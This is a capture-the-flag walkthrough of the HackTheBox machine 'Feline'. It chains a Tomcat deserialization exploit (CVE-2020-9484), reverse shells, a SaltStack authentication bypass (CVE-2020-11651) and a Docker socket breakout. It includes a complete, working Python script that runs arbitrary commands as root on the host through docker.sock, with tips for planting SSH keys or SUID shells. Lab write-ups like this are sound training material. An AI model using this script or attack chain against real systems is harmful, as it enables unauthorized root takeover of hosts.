Feline.
Feline is a box rated Hard on HackTheBox. Hard boxes are a rarity on this blog, as they take a lot of time and effort and eat up a lot of my very important days. However, let's see how we go.
As usual, starting with our nmap scan.
Only two ports are open: SSH on 22 and Apache Tomcat 9.0.27 on 8080.
This is what the home page looks like. There are a few other tabs in the menu, one of which is Services. Let's click it and see where it leads.
Hmm, the Services page lets us upload any type of file. However, I can't seem to execute any of the uploads or get any kind of response back. Weird. We do know the Tomcat version, though, so let's check whether there are any public exploits for it.
I quickly find a remote code execution exploit for this version, CVE-2020-9484: https://github.com/PenTestical/CVE-2020-9484. The bug is in Tomcat's PersistentManager: when sessions are persisted with a FileStore, the value of the JSESSIONID cookie is used to build the path of the session file that gets deserialized, with no check for path traversal. An attacker who can write a file somewhere on the box (our upload form) can therefore make Tomcat deserialize it, and with a suitable gadget chain on the classpath that means code execution.
However, the exploit's default bash payload didn't work for me, so I adapted it to my needs and did some custom exploitation. One caveat worth knowing with these payloads: the ysoserial gadget chains end in Runtime.exec(), which does not go through a shell, so pipes, redirections and && inside a one-liner are handed to the program as literal arguments rather than interpreted. I changed the exploit to work in two steps: download a .jar file from my server, then run it.
I generated the reverse shell .jar with msfvenom.
After running the modified exploit, I got my first reverse shell. OK nice, we're in.
Now let's try to escalate our privileges. First, let's check whether any services are listening only on localhost.
Ports 4505 and 4506 are listening on localhost only. A quick Google search shows that these are the default ports of a SaltStack master: 4505 is the publisher port that pushes jobs out to minions, and 4506 is the request server that minions, and anything else that can reach it, talk to.
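Slim containers often ship without netstat or ss, in which case /proc/net/tcp gives the same information. The parser below is an added example, not part of the original walkthrough; the SAMPLE content is constructed to mirror the state found on the box (8080 on all interfaces, 4505 and 4506 bound to loopback), not captured output.

```python
#!/usr/bin/env python3
"""List TCP listeners from /proc/net/tcp and flag the loopback-only ones.
Added example; SAMPLE is constructed, not captured from the box."""
import socket
import struct

LISTEN = "0A"  # value of the hex 'st' column for TCP_LISTEN


def parse_addr(hexaddr):
    """'0100007F:1199' -> ('127.0.0.1', 4505).

    The address is the kernel's native-order u32 printed in hex (so it reads
    byte-reversed on little-endian hosts); the port is plain big-endian hex."""
    ip_hex, port_hex = hexaddr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def listeners(proc_net_tcp):
    """Return [(ip, port, loopback_only)] for every socket in LISTEN state."""
    out = []
    for line in proc_net_tcp.splitlines()[1:]:  # first line is the header
        fields = line.split()
        if len(fields) < 4 or fields[3] != LISTEN:
            continue
        ip, port = parse_addr(fields[1])
        out.append((ip, port, ip.startswith("127.")))
    return out


def local_only_ports(proc_net_tcp):
    """Sorted ports reachable only from inside the host/container."""
    return sorted(port for ip, port, local in listeners(proc_net_tcp) if local)


# Constructed sample: Tomcat on 0.0.0.0:8080, salt-master on 127.0.0.1:4505/4506,
# plus one established (non-listening) connection that must be ignored.
SAMPLE = """  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0100007F:1199 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12346 1 0000000000000000 100 0 0 10 0
   2: 0100007F:119A 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12347 1 0000000000000000 100 0 0 10 0
   3: 0100007F:1199 0100007F:B4E2 01 00000000:00000000 00:00000000 00000000     0        0 12348 1 0000000000000000 20 4 30 10 -1
"""

if __name__ == "__main__":
    try:
        text = open("/proc/net/tcp").read()
    except OSError:
        text = SAMPLE
    for ip, port, local in listeners(text):
        print(f"{ip}:{port}" + ("  (loopback only)" if local else ""))
```

IPv6 listeners live in /proc/net/tcp6 with 32-hex-digit addresses, so a socket bound to [::]:port will not show up here; check that file too before concluding a service is loopback-only.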
Let’s see if there are any publicly available exploits for Salt.
I find this script, https://github.com/rossengeorgiev/salt-security-backports/blob/master/salt-cve-check.py, which checks whether a given Salt master is vulnerable. First, though, I forward the two local ports so that they are reachable from my pwning machine.
Running the check against the forwarded ports confirms that the Salt master is indeed vulnerable.
Then, after searching for exploits, this GitHub PoC for CVE-2020-11651 looks promising: https://github.com/jasperla/CVE-2020-11651-poc. CVE-2020-11651 is an authentication bypass in salt-master's ClearFuncs class: methods that should never have been exposed are reachable from the unauthenticated request port (4506), which lets a client retrieve the master's root key and then run arbitrary commands on the master and on any minion.
I write a simple rev.py Python reverse shell and execute it through Salt, and a reverse shell comes back.
Nice. Looking at my username and the hostname, it looks like I'm inside a Docker container, and some more enumeration confirms it (the usual tell-tales are a /.dockerenv file and docker entries in /proc/1/cgroup).
So let's look for ways to break out of the container. The Docker daemon runs as root on the host, so if we can get the daemon to do our bidding we effectively have root on the host OS.
After some enumeration, I found the Docker daemon's Unix socket, docker.sock, mounted under /run. Anything that can write to docker.sock can talk to the daemon's API and create a new container, for example one with the host's root filesystem bind-mounted, which makes breaking out trivial.
Following this tutorial: https://secureideas.com/blog/2018/05/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-1.html, I create a container.json file describing such a container and start the Docker breakout.
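The same breakout done against the Docker Engine API directly, as an added example (this is not the container.json from the tutorial or the one used on the box, and it needs no docker CLI inside the container). Assumptions: the socket path, that at least one image is already present on the daemon (nothing is pulled, since the container may have no internet access), and that the image ships a chroot binary; the command run on the host is whatever you pass in.

```python
#!/usr/bin/env python3
"""Docker breakout through a mounted docker.sock using only the Engine API.
Added example; not the tutorial's or the box's container.json.
Assumed: socket path, a locally present image with chroot, the host command."""
import http.client
import json
import socket
import sys


class UnixHTTPConnection(http.client.HTTPConnection):
    """http.client over an AF_UNIX socket; the Host header is irrelevant."""

    def __init__(self, path):
        super().__init__("localhost")
        self.unix_path = path

    def connect(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.unix_path)


def container_spec(image, host_cmd, mount="/host"):
    """Body for POST /containers/create: the host's "/" is bind-mounted at
    `mount` and the command runs inside a chroot of it, i.e. as root on the
    host.  Tty=true makes /logs return a raw stream instead of Docker's
    8-byte-framed multiplexed format."""
    return {
        "Image": image,
        "Cmd": ["chroot", mount, "/bin/sh", "-c", host_cmd],
        "Tty": True,
        "HostConfig": {"Binds": [f"/:{mount}"]},
    }


def api(conn, method, path, body=None):
    """One Engine API call; raises on 4xx/5xx, returns the raw response body."""
    data = json.dumps(body).encode() if body is not None else None
    headers = {"Content-Type": "application/json"} if data else {}
    conn.request(method, path, data, headers)
    resp = conn.getresponse()
    raw = resp.read()
    if resp.status >= 400:
        raise RuntimeError(f"{method} {path}: {resp.status} {raw.decode(errors='replace')}")
    return raw


def first_local_image(conn):
    """Reuse whatever image the daemon already has; pulling may be impossible."""
    for img in json.loads(api(conn, "GET", "/images/json")):
        for tag in img.get("RepoTags") or []:
            if tag != "<none>:<none>":
                return tag
    raise RuntimeError("no tagged image on the daemon")


def run_on_host(sock_path, host_cmd, image=None):
    """Create, start, wait for and remove a host-rooted container; return its output."""
    conn = UnixHTTPConnection(sock_path)
    image = image or first_local_image(conn)
    cid = json.loads(api(conn, "POST", "/containers/create",
                         container_spec(image, host_cmd)))["Id"]
    api(conn, "POST", f"/containers/{cid}/start")
    api(conn, "POST", f"/containers/{cid}/wait")
    out = api(conn, "GET", f"/containers/{cid}/logs?stdout=1&stderr=1")
    api(conn, "DELETE", f"/containers/{cid}")
    return out.decode(errors="replace")


if __name__ == "__main__":
    cmd = sys.argv[1] if len(sys.argv) > 1 else "id; hostname"
    print(run_on_host("/run/docker.sock", cmd))
```

"id; hostname" is just a proof; with the host root mounted, the same call can append an SSH public key to /root/.ssh/authorized_keys (port 22 is open on the box) or set the SUID bit on a copy of bash, which is what turns the breakout into a usable root shell. Note that the container is removed at the end so the daemon is left as it was found.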
YES! We've finally rooted it! The Docker breakout was successful and we have root on the host.